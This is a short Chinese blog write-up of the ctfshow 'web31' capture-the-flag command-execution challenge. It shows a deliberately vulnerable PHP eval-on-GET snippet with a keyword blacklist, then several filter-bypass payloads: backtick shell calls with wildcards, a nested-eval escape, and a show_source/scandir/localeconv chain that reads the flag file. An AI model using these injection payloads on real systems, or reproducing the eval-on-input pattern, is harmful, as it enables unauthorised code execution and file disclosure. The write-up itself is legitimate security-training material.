ctfshow-web入门-命令执行-web31

本文介绍了CTF比赛中的web31挑战,涉及多种尝试绕过过滤机制的命令执行方法,包括嵌套eval、show_source结合数组操作、伪协议文件包含和base64解码等技巧。通过对localeconv()、scandir()等函数的使用,展示了如何在受限环境中获取flag。
摘要由CSDN通过智能技术生成

web31

 

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤了flag,sstem,php,cat,sort,shell,点,空格,单引号

几种失败的姿势

1.?c=echo `tac fla?.*`;

2.?c=echo `tac fla?.*`;

3. ?c=`cp fla?.* 1.txt`;

姿势一,嵌套eval,逃逸参数

姿势二,show_source(next(array_reverse(scandir(pos(localeconv())))));

array用于创建数组

array_reverse将数组倒序输出

pos函数返回数组中当前元素(指针指向)的值

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值